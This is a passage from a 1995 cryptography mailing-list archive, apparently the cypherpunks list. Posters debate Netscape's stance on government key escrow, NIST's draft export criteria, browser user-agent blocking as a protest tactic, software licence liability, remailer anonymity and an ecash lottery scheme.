their export objectives with the government. Changes to the criteria: The criteria presented at the September 6-7 meeting have been modified in the following ways: Old Criterion 1. Moved to #7; wording clarified. Old Criterion 2. Moved to #8; wording clarified. Old Criterion 3. Split into #1 and #2 since the original criterion had two major points in it (the requirements for key escrow, and the requirement on when the keys are first escrowed); wording clarified. Old Criterion 4. Wording clarified; the notion of accessibility to authorized entities was modified to explicitly state that the required information must be available with a reasonable frequency. Old Criterion 5. Moved to #10; wording clarified, and the example was deleted so that implementors were not misled to believe that the example given was the only way of satisfying that requirement. Old Criterion 6. Moved to #9; wording clarified, and applicability of this requirement was scoped to address interoperability between a product's key escrow mode and a non-key escrow product. Old Criterion 7. Moved to #5; wording clarified. Old Criterion 8. Moved to #6; wording clarified because the term "repeated involvement" was perceived as being too broad. Old Criterion 9. Deleted. Old Criterion 10. Moved to #3; wording clarified, and requirement modified to not preclude the escrow of key by agents in addition to those required by these criteria. Note: The September (and November) version of the criteria is available electronically at: "http://csrc.ncsl.nist.gov/keyescrow/" ***************************************************** Elaine Frye Computer Systems Laboratory, NIST Bldg. 225/Rm.B154 Gaithersburg, MD 20899-0001 Voice: 301/975-2819 Fax: 301/948-1784 ***************************************************** From robl at on-ramp.ior.com Fri Dec 1 11:14:01 1995 From: robl at on-ramp.ior.com (RobL) Date: Sat, 2 Dec 1995 03:14:01 +0800 Subject: [NOISE]Re: AUTHOR A VIRUS, GO TO JAIL Message-ID: At 10:08 PM 11/30/95, Michael Coates wrote: >Found this intersting too. US Position? > >AUTHOR A VIRUS, GO TO JAIL >A computer cracker last week became the first virus writer sentenced to a >jail term under Great Britain's Computer Misuse Act. The 26-year-old >perpetrator was sentenced to 18 months in jail after pleading guilty to 11 >charges connected with placing virus-infected programs on computer bulletin >boards. (Investor's Business Daily 29 Nov 95 A6) Gak.. glad I don't live in G.B. as I have had as many as 700 virii available for download on my BBS.. wonder how long it will be before the start to prosecute authors for writing buggy software ;) ------------------|----------------------------------------------------------- Rob Lowry | PO Box 288 | Rockford Wa 99030 | ral at otc.mhs.compuserve.com robl at on-ramp.ior.com From rah at shipwright.com Fri Dec 1 11:16:47 1995 From: rah at shipwright.com (Robert Hettinga) Date: Sat, 2 Dec 1995 03:16:47 +0800 Subject: GAK, Netscape, CyberDog, and you. Message-ID: Hi Semper Fi-ers! I've been lurking on this list for a long time, and I haven't said much here primarily because I'm not a developer. I mean, I've hired developers, and sold the software I've had them build for me. Not very well, I might add, which is why I try do something else (talk and write) for a living now. Frankly, I couldn't code my way out of a paper bag, which, of course, is why I've not said much here. :-). Anyway, something has come up which I think makes the world very interesting, and I think you should know about it. Netscape has come out in favor of what the government calls "key escrow", but which most "cypher"-punks (and I seem to have become one over the last year and a half) call GAK, for Government Access to Keys. Here's the URL: http://www.cnet.com/Central/News/govt.html . This is a news report of a speech that Jim Clark gave at a trade show in Boston this week. Normally, as serious as this is in the rest of the world, that wouldn't really rate a mention here, except for the fact that this presents a very interesting set of opportunities for the *independent* Mac developer community in the form of CyberDog, Apple's set of OpenDoc parts for the internet. I'll get to that in a moment, but first, let me give you some background on the problem. Netscape's Jim Clark has quite a tightrope act going. He has a stock price which gives Netscape a P/E ratio of something like 7,000 (the S&P average right now is about 14), which means he really ought to get some revenue in the door, or his investors are going to have his hide. The next thing is, the government is a *really* big customer, and *they* want GAK, in case you haven't noticed. ;-). Couple this with the fact that Netscape is pretty much replicable by concentrated developer effort because its underlying technology is an open standard, *and* the fact that any significant attempt by them to create any real proprietary standards on the internet is practically impossible in the long run, unless they get a whole lot of very big customers in a hurry. Now, it looks like that's what happened already, because a lot of very large companies have signed on to using Netscape servers, but you can also see how really weak Netscape's position is when Uncle Sam knocks on their door and asks for a key escrow "bug" in every "secure" Netscape web session. This isn't the first time that Netscape has had problems with financial cryptography and the law. Netscape made the papers recently because the government-mandated SSL key-size in their export version was too small. (We won't talk about the cognitive dissonance between the words "export" and "internet" just yet...) The "export" version of Netscape Navigator got cracked by a French grad student in a university computer lab, who broke it just by running a bunch of background processes on his Sun workstations for a couple days over a weekend. The ITARs, the arms export laws covering this (cryptography is legally a munition, more cognitive dissonance), are a now problem for everybody who wants to do business securely and safely on the internet. More to the point, since digital bearer certificate technology, the most economical method for doing business on the net, is entirely based on digital signatures, which in turn are entirely based on very strong public key cryptography, all business on the internet will eventually require very strong cryptography. In other words, if you don't have unbreakable key sizes, you can't issue digital certificates to pay for things with. It would be like having paper money which is easy to forge. Lately, I like to say that "Digital Commerce *is* Financial Cryptography", and it's true. First Virtual has the only truly "out of band" internet transaction settlement mechanism, it's very well-designed, and very robust, but you have to remember that they did it *because* of the ITARs, and the complications for financial cryptography those regulations cause, no matter how much First Virtual itself likes to "dis" financial cryptography as a concept. Unfortunately, the transaction costs on such out-of-band methods are always going to be higher because of the inefficiencies of not instantly settling transactions, like you can with something like digital cash. When you buy something in the store for cash, you initiate, settle and clear the trade all at once, right there at the cash register, without an audit trail to maintain. Frankly, *any* credit card trade is really an "out-of-band" method, because it has to go off of the net to clear and settle, with audit trails, and the overhead of their offsetting book-entries. Fortunately, as governments start to figure this out, they will have to stand back and let the economic train go by, so to speak. So, having said all that, let's talk about OpenDoc and CyberDog. I hear that with CyberDog, building a secure Netscape-compatible browser in OpenDoc is now pretty simple. That adding economically useful -- and interchangable -- functionality like strong encryption, digital cash protocols and most of the tools of digital commerce is also pretty straightforward. That is, even though they have to be developed separately, because Apple justifiably doesn't want to have the ITARs limiting its export market for both OpenDoc and CyberDog. Again that cognitive dissonance between "export" and "internet". In addition to building utterly secure browser-server links, I see some interesting OpenDoc digital commerce applications coming out of a Netscape-compatible browser. My favorite "flash" on this was imagining the ability to drag Digicash ecash dollar bill icons out of a wallet and dropping them on a cash-register icon in a web page to pay for a transaction. That's certainly doable with OpenDoc and CyberDog. In addition, the IETF has just promulgated a secure link-level encryption standard called IPSEC, which allows for encrypted links between any two machines on the net, with any cryptographic method you want. That looks like a great Open Transport Streams Module project to me. And the wierd thing is, once IPSEC is out there, GAK in Netscape becomes moot, anyway. Netscape can only shoot itself in the foot here, and it looks like they already have, with a premature announcement of GAK. One final thing about Netscape. It's not their fault. There is no evil man-behind-the curtain in all of this. The government's doing what it thinks necessary for the preservation of order, and thinks it needs GAK to do that. Netscape is doing the best it can for its (newly rich) stockholders, and thinks it needs to comply with Uncle Sam, which it probably in fact has to do, or burst it's stock market price sooner, rather than later. Also, there is no reason why Netscape can't make a Navigator OpenDoc part, and I expect that they are planning to. I bet that Apple would really like that, and as a matter of fact, is probably courting Netscape to do exactly that. But I also know that by using OpenDoc and CyberDog, that the user can create a very easy to use, flexible, extensible, and *powerful* internet environment. Being there first with a Netscape-compatible browser, especially one that doesn't have GAK built into it, will be worth a whole lot in the marketplace for any enterprizing independent OpenDoc parts developer. I'm going to be giving a talk on Wednesday at noon at Apple's Town Hall, (4 Infinite Loop) in Cupertino about what I'm calling "geodesic" markets, that is, financial cryptography on the internet. The URL for a web page with all the details is http://thumper.vmeng.com/pub/rah/talk.html . In addition, if you want more stuff on financial cryptography, you might want to try my e$ home page, which is in my .sig, below. Finally, I've asked an *actual* financial cryptographer, Eric Hughes, who many of you may know from the cypherpunks mailgroup, and from the Clipper fight, to show up at the Cupertino talk and bail me out on the real hard questions. Well, that's about it. Oh. The talk is titled "Financial Cryptography for Dogs". I think you can see why, in light of the events of the last week, it's quite appropriate. Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971 "Reality is not optional." --Thomas Sowell The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/ >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From loki at obscura.com Fri Dec 1 11:16:51 1995 From: loki at obscura.com (Lance Cottrell) Date: Sat, 2 Dec 1995 03:16:51 +0800 Subject: nsa and netscape Message-ID: Could we have a source or a confirmation of this. It is a conspiracy theorists wet dream, so I will reserve judgement until there is more evidence that this is true. -Lance At 4:31 AM 12/1/95, Bob Bruen, MIT Lab for Nuclear Science wrote: > The following came from a government source. I thought it might be of > interest. > Bob >-------------------------------------------------------------------------- > > At yesterdays FNC (Federal Networking Council) meeting it was > mentioned in passing that NSA has given Netscape a grant of $5 Million > (yes $5M) to beef up the security features of Netscape. More info will > be forthcoming on this. ---------------------------------------------------------- Lance Cottrell loki at obscura.com PGP 2.6 key available by finger or server. Mixmaster, the next generation remailer, is now available! http://obscura.com/~loki/Welcome.html or FTP to obscura.com "Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche ---------------------------------------------------------- From liberty at gate.net Fri Dec 1 11:28:47 1995 From: liberty at gate.net (Jim Ray) Date: Sat, 2 Dec 1995 03:28:47 +0800 Subject: Netscape gives in to key escrow Message-ID: <199512011842.NAA43335@tequesta.gate.net> -----BEGIN PGP SIGNED MESSAGE----- [Warning: More linguistic than crypto relevance follows.] Tim wrote: >At 10:45 AM 12/1/95, JR at ns.cnb.uam.es wrote: >>With regard to all this waving about Netscape giving in to key scrow... > >Key _escrow_, though "scrow" is perhaps just as accurate as the >improperly-named "key escrow" Indeed. One of the main libertarian objections to the term "key escrow" is the "it's Newspeak" objection. "Escrow" [from the Hypertext Webster Interface at http://c.gp.cs.cmu.edu:5103/prog/webster?escrow ] means: __________ 1. es.crow \'es-.kro-, es-'\ n [MF escroue scroll] 1: a deed, a bond, money, or a piece of property delivered to a third person to be delivered ^^^^^^^^^^^^ by him to the grantee only upon the fulfillment of a condition 2: a fund or deposit designed to serve as an escrow 2. es.crow \es-'kro-, 'es-.\ vt : to place in escrow __________ [emphasis added.] The number of cases that begin: "US v. ___," or that end: "___ v. US," puts the lie to the idea that the government could somehow be *any sort* of a "third person" in many of the cases that come before the (government employees, albeit with some autonomy, known as) judges. Mine is, of course, the libertarian view of "the government as one giant blob," as opposed to various contrary views of "the government as many wonderful-but-separate agencies who are all just trying to do their best." My view, while certainly not the majority view, is pervasive enough that [IMO] the current government terminology of "key escrow" *should* change to a less Orwellian term. > (hint: escrow is something done voluntarily, not the situation here > with GAK). I liked the term "FUCKED" better, but I guess I can settle for "GAK." JMR Regards, Jim Ray -- http://www.shopmiami.com/prs/jimray Al Gore's mission is to reinvent government. He seems to have started with the office of the vice president. His staff is 48 percent larger than Dan Quayle's was. -- Reason "Brickbats" October, 1995 issue. - ----------------------------------------------------------------------- PGP key Fingerprint 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8 Key id. # E9BD6D35 (key on page & servers) IANAL - ----------------------------------------------------------------------- Help Phil! email zldf at clark.net or http://www.netresponse.com/zldf _______________________________________________________________________ -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Freedom isn't Freeh. iQCVAwUBML9Lp21lp8bpvW01AQENGQP/XDh27QPgG/XkyYEHA255ij7fV1yrGKnO iGlWPFEzEnewoBWcJChIjDA4jTDJFiGT2D6VlEG8V8OyFPoHmdYPhkDGbIixjHE+ ZZMrWrzmbgiijLU9+Fp4Ib3cQibeefQY1HpmZ3wGd/3mLpu5gCtU8t3/Xx5PcZSF ueAU57DmJO8= =zVa0 -----END PGP SIGNATURE----- From jamesd at echeque.com Fri Dec 1 11:34:01 1995 From: jamesd at echeque.com (James A. Donald) Date: Sat, 2 Dec 1995 03:34:01 +0800 Subject: GAK Flap Happening at a Good Time--Journalists Read! Message-ID: <199512011556.HAA08776@blob.best.net> At 03:01 AM 12/1/95 -0800, Timothy C. May wrote: >I hope the media types reading now will attend the December 5th (I >think...details should be available) gathering on "key escrow" in >Washington. D.C. This should be a fiery meeting, especially if the Netscape >reps (I assume someone from Netscape will be attending, given their central >role in the all-important Web world) either denounce GAK or support GAK. I will prepare the netscape dehanced dirty pictures web page, but not advertize the URL until shortly after December 5th. I hope to hear a suitable "clarification" before then. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From tcmay at got.net Fri Dec 1 11:38:08 1995 From: tcmay at got.net (Timothy C. May) Date: Sat, 2 Dec 1995 03:38:08 +0800 Subject: GAK Flap Happening at a Good Time--Journalists Read! Message-ID: At 8:43 AM 12/1/95, Leslie Todd Masco wrote: >I've been told that many media-types go to the archives whenever c'punks >make the news. How much of an effect do y'all think it'll have if they >can't do it with Netscape? Even better, let's see the journalists get the story first-hand. I hope the media types reading now will attend the December 5th (I think...details should be available) gathering on "key escrow" in Washington. D.C. This should be a fiery meeting, especially if the Netscape reps (I assume someone from Netscape will be attending, given their central role in the all-important Web world) either denounce GAK or support GAK. Frankly, and my thanks again to Sameer for bringing this to our attention, this flap over Jim Clark's GAK-supporting remarks could not have come at a better time: the issue of GAK will not be ignored. --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From hal9001 at panix.com Fri Dec 1 11:56:01 1995 From: hal9001 at panix.com (Robert A. Rosenberg) Date: Sat, 2 Dec 1995 03:56:01 +0800 Subject: Barring access to Netscape Message-ID: At 0:32 12/1/95, Ed Carp wrote: >If you want to bar access to your site from a Netscape browser, such >can easily be accomplished. If memory serves, every browser, when >connecting to a site, exchanges certain information about the client >with the server. One can gain access easily to that information. > >I believe that Netscape uses "Mozilla" as their keyword when >exchanging browser-specific information. If you want to see one way of locking out Netscape users, check out this URL which points at a Web Page that will not allow access by Netscape Users (the guy is ticked off at them trying to establish their own standards) - http://www.ccs.neu.edu/home/ratinox/angels/ From tcmay at got.net Fri Dec 1 11:56:36 1995 From: tcmay at got.net (Timothy C. May) Date: Sat, 2 Dec 1995 03:56:36 +0800 Subject: CPunks in the news: St. Jude Message-ID: At 5:12 PM 12/1/95, Jim Gillogly wrote: >Today's (1 Dec 95) LA Times has a writeup on female "hackers", and gives >several sympathetic column-inches to St. Jude Milhon, a charter Cypherpunk. >Evidently she has a new book coming out (Girls with Modems?). I saw a book yesterday along the lines of "Girl Hackers" (or should it be the Cybernetically Correct "Grrl Hackers"?) I forget the exact title and author, but it's written in the typically breezy, cut-and-paste style pioneered by Stewart Brand and Ted Nelson and now apparently the only acceptable form for anthing connected to the Net. Interviews with Jude Milhon and Romana Machado (aka "Cypherrella"). (For more on Romana and her Cypherella personna, see http://www.best.com/~fqa/romana/) I didn't buy it, though I did buy the "Cyberpunk's Handbook" a few months ago. It was co-authored by Jude, with Eric Hughes as the cover model. Others have reviewed it here recently. And Jude has another book coming out, something like "How to Mutate and Take Over the World." Personally, I find it distasteful--just my opinion, with no aspersions cast on Jude, Romana, Eric, Robert, etc.--that so much blatant self-promotion is becoming the norm. (Yes, I know I agreed to be one of the "cover models" for the issue of "Wired" on "Crypto Rebels," but this was almost 3 years ago and I think now I wouldn't agree to it--in fact, I've turned down a dozen requests for interviews recently, feeling the planned interviews were fluffery and not substantive.) It seems that the media loves to see the extreme side of people, and encourages really strange antics and bizare self-labelling. The glut of Internet magazines ("Wired," "Net Guide," "Infobahn," etc.) and the even greater glut of pop culture mags with Internet connections ("Raygun," "Detail," and a dozen others, mostly with Traci Lords or Sandra Bullock on their covers) means there must be some appetite for these personality pieces. And the more outrageous a personna, the more coverage. (Recall that one Cypherpunk list reader saw the British t.v. show that covered Cypherpunks and mentioned "a porn star named Cypherella who writhed on the floor while describing PGP"...I didn't see this show, but I presumed he was seeing Romana in her "crypto bondage and discipline" outfit. I count Romana as a friend, though I haven't seen her in a long time, but I _personally_ am slightly embarassed at this sort of thing...again, no aspersions cast against her choices in life.) (I expect this will find its way to Romana--Hi, Romana!--courtesy of her friends and/or of search engines like Deja News, and I suppose I really should take this out so as to avoid any hard feelings. But, I guess I won't. Jude, Romana, Lisa Palac, and all the other "cybergrrls" are just players in the media fascination with such things. To each their own. I don't have to buy the books or magazines which extol them, so all is well.) The "cult of personality" is alive and well in cyberia. --Tim May, expecting some angry e-mail over the next few weeks Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From s1113645 at tesla.cc.uottawa.ca Fri Dec 1 12:00:15 1995 From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca) Date: Sat, 2 Dec 1995 04:00:15 +0800 Subject: I Agree buttons, GAKzilla & liability. In-Reply-To: Message-ID: On Fri, 1 Dec 1995, Brian Davis wrote: > Well that would depend on the terms of the agreement to hold the escrowed > keys, wouldn't it? And presumably the GAK keyholder will have lawyers > write the agreement so that it says, in essence, "we will try really > really hard not to let the keys out, but if they get out, our only > liability if to say 'Ooops' followed by a heartfelt apology!" This sounds like the fine print you "agree" to by opening commercial software packages. Hasn't this been found void in a couple of places? The "OK" or "I Agree" buttons I'm forced to press (but you don't *have* to download software, nya,nya,nya...) when downloading wares also comes to mind. Has this been tested in a court? (Sega's reverse engineering suit from a while back comes to mind) Pressing buttons is hardly the same as your notarized handwritten signature on paper (we prefer blood, it's more permanent), or its digital equivalent. Mere tokenism, not insurance. About JR's concern about Netscape's shareholders, they're playing a bubble market and they know it. I wish them all the money and luck; luck is something they're gonna need if this is to go on. Ps. Netmanage websurfer ain't so bad, hint, hint, hint (detraction time netscape). From m1tca00 at FRB.GOV Fri Dec 1 12:26:40 1995 From: m1tca00 at FRB.GOV (Thomas C. Allard) Date: Sat, 2 Dec 1995 04:26:40 +0800 Subject: key for Alice as promised (not) Message-ID: <9512011943.AA29646@bksss1.FRB.GOV> -----BEGIN PGP SIGNED MESSAGE----- If Alice is so afraid of using PGP, then he's sending his messages through the remailer chain unencrypted (if it even goes through a chain). In that case, the FIRST remailer knows who Alice is... it sees his message, the final destination, and Alice's real address. rgds-- TA (tallard at frb.gov) +-+ I don't speak for the Federal Reserve Board, it doesn't speak for me. |X| pgp fingerprint: 10 49 F5 24 F1 D9 A7 D6 DE 14 25 C8 C0 E2 57 9D +-+ -----BEGIN PGP SIGNATURE----- Version: 2.7 iQCVAwUBML9awKAudFplx0TNAQFUZAQAqjrSOlgy7erUi8eDqdWUNkuVgDBLiJk8 dkxaiTU4pbw+hpQzfydMipxJi3VxVuDiL54k7jEM8NoTPFZTQWPB1NuzOGIvBHPy FvxX3ojlk53/1ZYJBQaoy5eiYaGpyS/KgmLI0XCitT4h3LHNcVk6UrM7PQNURLWK DETslOeBykM= =A3Vf -----END PGP SIGNATURE----- From beavis at bioanalytical.com Fri Dec 1 12:54:07 1995 From: beavis at bioanalytical.com (Beavis B. Thoopit) Date: Sat, 2 Dec 1995 04:54:07 +0800 Subject: available news/mail filtering Message-ID: <199512012001.PAA01825@bioanalytical.com> What news and mail filter programs are available? Pointers will be appreciated. If inclined, please give some pros/cons of your favorites. Thank you for your help in this matter. From frantz at netcom.com Fri Dec 1 13:08:35 1995 From: frantz at netcom.com (Bill Frantz) Date: Sat, 2 Dec 1995 05:08:35 +0800 Subject: Media Advisory: GAK on Dec 5 Message-ID: <199512012008.MAA01226@netcom23.netcom.com> At 17:26 12/1/95 +0100, Anonymous wrote: >Nov. 6, 1995 >Contact: Anne Enright Shepherd >(301) 975-4858 >anne.shepherd at nist.gov > > > MEDIA ADVISORY > > U.S. GOVERNMENT SEEKS PUBLIC COMMENT ON > > DRAFT EXPORT CRITERIA FOR KEY ESCROW ENCRYPTION > ... >... The exportability >criteria being proposed are for an expedited licensing review >process for software key escrow encryption products with keys >up to 64 bits long. ... Sounds like they want both GAK and brute force attacks to work. Perhaps they are worried that Labour will win in Britain and turn off their access to the British GAK agent. Bill Frantz From frantz at netcom.com Fri Dec 1 13:09:36 1995 From: frantz at netcom.com (Bill Frantz) Date: Sat, 2 Dec 1995 05:09:36 +0800 Subject: Barring access to Netscape Message-ID: <199512012008.MAA01222@netcom23.netcom.com> IMHO, all the people who are planning to alter web pages to deal with the Netscape/GAK issue should consider the following points: (1) A recent large web site reported that 95% of their accesses were from Netscape browsers. (2) You want to inform the public and put pressure on Netscape, not piss off the people using netscape browsers. A quick, one page, detour would seem appropriate, but not denial of access or other hostile acts. (3) You should save some room for esclation. (e.g. denial of access etc.) Don't hit them with everything in the first round. (4) Any list of alternative browsers has to include at least one viable browser for each of the major platforms. (At least, Windows, Mac, SunOS, Solaris, HP, AIX, BSD, Linux. Probably a lot more.) Bill Frantz From gorkab at sanchez.com Fri Dec 1 13:16:45 1995 From: gorkab at sanchez.com (Brian Gorka) Date: Sat, 2 Dec 1995 05:16:45 +0800 Subject: Browser Reports Message-ID: <01BABFFE.EE4F9020@loki> Microsoft's Browser (my choice right now) reports: If you want to know what yours reports, check out http://www.sanchez.com/tt.htp Mozilla/1.22 (compatible; MSIE 2.0; Windows 95) From JonathanZ at consensus.com Fri Dec 1 13:18:14 1995 From: JonathanZ at consensus.com (Jonathan Zamick) Date: Sat, 2 Dec 1995 05:18:14 +0800 Subject: Netscape gives in to key escrow Message-ID: >I they tell you about it and you buy it anyway -- tough luck. > > >Same with the cars. Would *you* buy Pinto with explosives in it???? >(leaving aside the "inherently dangerous" argument for the moment on the >products liability claim). > >EBD Hmm. The key point is that almost no general users will have a clue what actual security is, and what GAK is. They _might_ understand the risks of having an explosive in their vehicle (but can just as easily argue it wasn't properly designed if it went off improperly.) Regardless of what they'd know about their vehicle, they can easily claim to had the risks associated with GAK improperly represented, Netscape misleading them with deceptive claims of security given this potential hole etc. I'm not saying whether or not this is the case, but we are very much in a legal period where individuals are in fact expected not to need common sense, and corporations are responsible for cleaning up after consumer stupidity. It is certainly true that given the general state of education regarding crypto, the average consumer can easily say that regardless of warnings about GAK, that they weren't properly informed of the risk. With all the hype around security, Netscape and encryption people will be under the impression regardless of one little disclaimer tag, that their information is safe. Neither government nor corporations will disabuse them of this belief. The case would be strong against them as a consumer. Jonathan ------------------------------------------------------------------------ ..Jonathan Zamick Consensus Development Corporation.. .. 1563 Solano Ave, #355.. .. Berkeley, CA 94707-2116.. .. o510/559-1500 f510/559-1505.. ..Mosaic/WWW Home Page: .. .. Consensus Home Page .. From cactus at hks.net Fri Dec 1 13:18:55 1995 From: cactus at hks.net (Leslie Todd Masco) Date: Sat, 2 Dec 1995 05:18:55 +0800 Subject: Barring access to Netscape Message-ID: <199512012016.PAA26079@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- On Fri, 1 Dec 1995, Ed Carp wrote: > I believe that Netscape uses "Mozilla" as their keyword when > exchanging browser-specific information. An interesting side-effect: It seems that the Microsoft browser also sends "Mozilla". - -- Todd Masco | "life without caution/ the only worth living / love for a man/ cactus at hks.net | love for a woman/ love for the facts/ protectless" - A Rich Cactus' Homepage - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBML9iryoZzwIn1bdtAQHrkwF5AQ/6ldj1MG7JA05l7wOJw5MebvCvGEok zTfJg30NjNK8MLStXz2fGuDhMMs2ZIHJ =VVSJ -----END PGP SIGNATURE----- From perry at piermont.com Fri Dec 1 13:37:00 1995 From: perry at piermont.com (Perry E. Metzger) Date: Sat, 2 Dec 1995 05:37:00 +0800 Subject: Barring access to Netscape In-Reply-To: <199512012008.MAA01222@netcom23.netcom.com> Message-ID: <199512012028.PAA08954@jekyll.piermont.com> Bill Frantz writes: > (2) You want to inform the public and put pressure on Netscape, not piss > off the people using netscape browsers. A quick, one page, detour would > seem appropriate, but not denial of access or other hostile acts. I favor putting a GIF and text on the top of every page saying BIG BROTHER INSIDE YOUR BROWSER [Insert nasty logo here.] You are apparently using Netscape, the browser that intentionally lets people tap your communications. For more information, click _here_. To download a better browser now that doesn't have Big Brother Inside, click _here_. To send e-mail to the CEO of Netscape telling him how upset this makes you, click _here_. You can get your server to simply put that at the top of every page served to a Netscape client, followed by a horizontal line and the normal web page. It should be easy to put together the hacks to do that and get them out to lots of people. Watch how fast people would switch from Netscape, especially were it widely deployed. You would then watch a fast fall in Netscape stock, which would likely piss Jim Clark off far more than anything else one could do. We need HTML 3.0 capable browsers for all platforms, though. Perry From gimonca at mirage.skypoint.com Fri Dec 1 13:42:33 1995 From: gimonca at mirage.skypoint.com (Charles Gimon) Date: Sat, 2 Dec 1995 05:42:33 +0800 Subject: nsa and netscape (fwd) Message-ID: Forwarded message: > From: "Bob Bruen, MIT Lab for Nuclear Science" > > The following came from a government source. I thought it might be of > interest. > Bob > -------------------------------------------------------------------------- > > At yesterdays FNC (Federal Networking Council) meeting it was > mentioned in passing that NSA has given Netscape a grant of $5 Million > (yes $5M) to beef up the security features of Netscape. More info will > be forthcoming on this. > I found my way to http://www.fnc.gov, but the most recent documents that they had online were about three weeks old. I, too, am curious what the source for this was. From perry at alpha.jpunix.com Fri Dec 1 13:57:23 1995 From: perry at alpha.jpunix.com (John Perry) Date: Sat, 2 Dec 1995 05:57:23 +0800 Subject: Updated lists Message-ID: <199512012043.OAA00733@alpha.jpunix.com> -----BEGIN PGP SIGNED MESSAGE----- For those of you that use the Mixmaster type2.list and pubring.mix from vishnu.alias.net for your mixmaster clients, I have just made some changes to these files on vishnu. You may want to update accordingly. John Perry - KG5RG - perry at alpha.jpunix.com - PGP-encrypted e-mail welcome! Packet Radio - KG5RG at WA4IMZ.#SETX.TX.USA.NA WWW - http://www.jpunix.com PGP 2.62 key for perry at jpunix.com is on the keyservers. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBML9o2lOTpEThrthvAQGCTgP9F0kt6INVXFMZVg1Q+/yyoukhg8BJF8M7 PnGr8XoO0nc8oLWcNbQSG66oXQuDESNhMg6+/MoZzcmT6NKral1Gr7KCRqDuYX+/ O6JMmipO0NSqKwn7HPkDi7HSEc0g5gGsdp53y+3OXYi+KrYLcDjs5ov22D0ryTun jfksXFfEBrw= =cdZU -----END PGP SIGNATURE----- From herbs at interlog.com Fri Dec 1 13:57:25 1995 From: herbs at interlog.com (Herb Sutter) Date: Sat, 2 Dec 1995 05:57:25 +0800 Subject: [NOISE] Barring access to Netscape Message-ID: <199512012041.PAA29577@gold.interlog.com> At 14:26 12.01.1995 -0500, Robert A. Rosenberg wrote: >If you want to see one way of locking out Netscape users, check out this >URL which points at a Web Page that will not allow access by Netscape Users Just a personal note... while I am strongly in favour of security, this seems rather petulant and knee-jerkish. JeffW: Please add a configuration option to let users override the "Mozilla" ident, so that they can continue to use Netscape at all sites. I personally won't use the override, though; if a site is going to insist on trying to frivolously exlude me as a user based on nothing but the browser I choose to use, they aren't serious anyway. >(the guy is ticked off at them trying to establish their own standards) - The _market_ establishes standards (been proven time and time again). His reaction sounds pretty childish to me, but YMMV... Herb ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Herb Sutter 2228 Urwin, Suite 102 voice (416) 618-0184 Connected Object Solutions Oakville ON Canada L6L 2T2 fax (905) 847-6019 From ali at eit.com Fri Dec 1 14:25:24 1995 From: ali at eit.com (Ali Bahreman) Date: Sat, 2 Dec 1995 06:25:24 +0800 Subject: digital receipts and cash Message-ID: <199512012117.NAA22727@penetralium.eit.com.> I have a paper on "Certified Electronic Mail" which I feel helps in your quest to create "digital receipts". See my home at www.eit.com/~ali for pointers. The paper was published at the 1994 ISOC Symposium jointly with my thesis advisor, Doug Tygar. Regards, Ali From s1113645 at tesla.cc.uottawa.ca Fri Dec 1 14:43:44 1995 From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca) Date: Sat, 2 Dec 1995 06:43:44 +0800 Subject: Aware's radiation detector Message-ID: This month's Scientific American has an ad by Aware for that serial port radiation detector we were discussing a while back. Upper right corner of page 109, I think. Sells for $149 US, 45 day money back guaranty. From sameer at c2.org Fri Dec 1 15:04:09 1995 From: sameer at c2.org (sameer) Date: Sat, 2 Dec 1995 07:04:09 +0800 Subject: Barring access to Netscape In-Reply-To: <199512012028.PAA08954@jekyll.piermont.com> Message-ID: <199512012157.NAA00703@infinity.c2.org> > > You can get your server to simply put that at the top of every page > served to a Netscape client, followed by a horizontal line and the > normal web page. It should be easy to put together the hacks to do > that and get them out to lots of people. Watch how fast people would > switch from Netscape, especially were it widely deployed. You would > then watch a fast fall in Netscape stock, which would likely piss Jim > Clark off far more than anything else one could do. > Perry's suggestion has my vote, and will be implemented at c2.org when lance puts up his page. -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 The Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org/ (or login as "guest") sameer at c2.org From sjb at universe.digex.net Fri Dec 1 15:14:24 1995 From: sjb at universe.digex.net (Scott Brickner) Date: Sat, 2 Dec 1995 07:14:24 +0800 Subject: ecash lottery (Was: ecash casino) In-Reply-To: <49j0sq$a69@calum.csclub.uwaterloo.ca> Message-ID: <199512012201.RAA25506@universe.digex.net> Ian Goldberg writes: >People pay by sending: >{ >A payment made out to "@" (the ecash wildcard) >Their choice of lottery ticket number >A PGP Public key >} >encrypted with the lottery's public key, to the remailer address. You still have the problem that the lottery agency gets to hold the money until after the drawing. It's reasonable to expect that they'll eventually take advantage of their anonymity to just skip the drawing and abscond with the bucks. There's some incentive for them to *not* do this on the first few drawings, but only so they can get a good enough reputation so when they *do* skip, they'll get a lot more money. The problem with this whole scheme is that there has to be some 